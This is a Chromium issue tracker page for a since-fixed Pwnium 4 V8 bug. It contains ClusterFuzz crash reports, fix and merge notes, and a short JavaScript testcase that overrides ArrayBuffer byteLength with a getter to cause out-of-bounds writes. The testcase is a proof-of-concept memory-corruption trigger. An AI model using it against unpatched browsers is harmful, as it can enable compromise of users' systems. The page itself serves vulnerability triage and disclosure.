Sign in to add a comment
|
Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength | |||||||||||||||||||||||||||||||
| Project Member Reported by infe...@chromium.org, Mar 12 2014 | Back to list | |||||||||||||||||||||||||||||||
v8 OOB bug
,
Mar 12 2014
,
Mar 12 2014
,
Mar 12 2014
,
Mar 12 2014
,
Mar 12 2014
,
Mar 12 2014
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5720086883074048 Uploader: inferno@chromium.org Job Type: Linux_asan_chrome_mp Crash Type: UNKNOWN Crash Address: 0x609000150000 Crash State: - crash stack - v8::internal::Invoke v8::Script::Run WebCore::V8ScriptRunner::runCompiledScript Minimized Testcase (0.21 Kb): Download: https://cluster-fuzz.appspot.com/download/AMIfv972juZ8LFn7J8O9Gg3Ksg9ugGIInvgfeq-7w0wESmJ87-B5cZuy1gOXc8BmlNA4VBeFRZ1QmRP4O2w32AsPvaJtrL3wOokxkhQ_8GO2j8EcOIawwRj-vn1VcvCgQpF7XNfucx33vc_3HFSLZmyKwYo2b8yN5A <script> var ab = new ArrayBuffer(8); ab.__defineGetter__("byteLength", function() { return 0xFFFFFFFC; }); var aaa = new Uint32Array(ab); for (var i = 0; i < 0x8000; i+=1) { aaa[i] = 1; } </script>
,
Mar 12 2014
,
Mar 12 2014
(summarizing for the V8 team): The V8 fix is for all trusted usages of properties on ArrayBuffers and other TypedArray variants to use un-patchable intrinsics rather then a property access. Jakob has a patch that fixes this specific problem, but we're auditing the rest of the TypedArray code for similar problems.
,
Mar 12 2014
,
Mar 12 2014
Fixed in V8 bleeding_edge: https://code.google.com/p/v8/source/detail?r=19862. Merged to M33 as V8 3.23.17.23. Merged to M34 as V8 3.24.35.15.
,
Mar 12 2014
,
Mar 12 2014
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5720086883074048 Uploader: inferno@chromium.org Job Type: Linux_asan_chrome_mp Crash Type: UNKNOWN Crash Address: 0x00009fff8002 Crash State: - crash stack - WebCore::Document::popCurrentScript WebCore::ScriptLoader::executeScript WebCore::ScriptLoader::prepareScript Regressed: https://cluster-fuzz.appspot.com/revisions?range=234419:234464 Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv972juZ8LFn7J8O9Gg3Ksg9ugGIInvgfeq-7w0wESmJ87-B5cZuy1gOXc8BmlNA4VBeFRZ1QmRP4O2w32AsPvaJtrL3wOokxkhQ_8GO2j8EcOIawwRj-vn1VcvCgQpF7XNfucx33vc_3HFSLZmyKwYo2b8yN5A
,
Mar 12 2014
,
Mar 13 2014
,
Mar 13 2014
,
Mar 13 2014
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5905159708213248 Fuzzer: Mbarbella_js_mutation Job Type: Linux_asan_d8_v8_arm Crash Type: Heap-buffer-overflow READ 100000 Crash Address: 0xf5fcb3e0 Crash State: - crash stack - v8::internal::Runtime_ArrayBufferSliceImpl v8::internal::Simulator::SoftwareInterrupt v8::internal::Simulator::InstructionDecode Minimized Testcase (3.50 Kb): https://cluster-fuzz.appspot.com/download/AMIfv940PeGBCMH8eFQpTfxqfeTehbbuuHbU-SfxhHHAB-1DJ3LMEoVU1tY-IFHG4LPXxpip_hohSuIJTEYFxY-XVlWwaiFfPY3-sBT7lazDV-TSiYP07VsE6MJSXYhFrp2z8Qe6XVSJq6H22maA1cyBdkPG2rzyng
,
Mar 13 2014
We get much better stacks from arm build, logged in above just for reference.
,
Mar 13 2014
,
Mar 13 2014
,
Mar 14 2014
,
Mar 14 2014
,
Mar 14 2014
,
Mar 14 2014
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5720086883074048 Uploader: inferno@chromium.org Job Type: Linux_asan_chrome_mp Crash Type: UNKNOWN Crash Address: 0x00009fff8002 Crash State: - crash stack - WebCore::Document::popCurrentScript WebCore::ScriptLoader::executeScript WebCore::ScriptLoader::prepareScript Regressed: https://cluster-fuzz.appspot.com/revisions?range=234419:234464 Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv972juZ8LFn7J8O9Gg3Ksg9ugGIInvgfeq-7w0wESmJ87-B5cZuy1gOXc8BmlNA4VBeFRZ1QmRP4O2w32AsPvaJtrL3wOokxkhQ_8GO2j8EcOIawwRj-vn1VcvCgQpF7XNfucx33vc_3HFSLZmyKwYo2b8yN5A
,
Mar 14 2014
,
Mar 14 2014
,
Mar 14 2014
ClusterFuzz has detected this issue as fixed in range 256789:256846. Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5720086883074048 Uploader: inferno@chromium.org Job Type: Linux_asan_chrome_mp Crash Type: UNKNOWN Crash Address: 0x00009fff8002 Crash State: - crash stack - WebCore::Document::popCurrentScript WebCore::ScriptLoader::executeScript WebCore::ScriptLoader::prepareScript Regressed: https://cluster-fuzz.appspot.com/revisions?range=234419:234464 Fixed: https://cluster-fuzz.appspot.com/revisions?range=256789:256846 Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv972juZ8LFn7J8O9Gg3Ksg9ugGIInvgfeq-7w0wESmJ87-B5cZuy1gOXc8BmlNA4VBeFRZ1QmRP4O2w32AsPvaJtrL3wOokxkhQ_8GO2j8EcOIawwRj-vn1VcvCgQpF7XNfucx33vc_3HFSLZmyKwYo2b8yN5A If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
,
Mar 14 2014
ClusterFuzz has detected this issue as fixed in range 256789:256846. Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5905159708213248 Fuzzer: Mbarbella_js_mutation Job Type: Linux_asan_d8_v8_arm Crash Type: Heap-buffer-overflow READ 100000 Crash Address: 0xf5fcb3e0 Crash State: - crash stack - v8::internal::Runtime_ArrayBufferSliceImpl v8::internal::Simulator::SoftwareInterrupt v8::internal::Simulator::InstructionDecode Fixed: https://cluster-fuzz.appspot.com/revisions?range=256789:256846 Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv940PeGBCMH8eFQpTfxqfeTehbbuuHbU-SfxhHHAB-1DJ3LMEoVU1tY-IFHG4LPXxpip_hohSuIJTEYFxY-XVlWwaiFfPY3-sBT7lazDV-TSiYP07VsE6MJSXYhFrp2z8Qe6XVSJq6H22maA1cyBdkPG2rzyng If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
,
Mar 27 2014
,
Jun 18 2014
Bulk update: removing view restriction from closed bugs.
,
Feb 2 2016
,
Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 2 2016
,
Oct 2 2016
,
Oct 3 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
||||||||||||||||||||||||||||||||
| ► Sign in to add a comment | ||||||||||||||||||||||||||||||||
6.9 KB View Download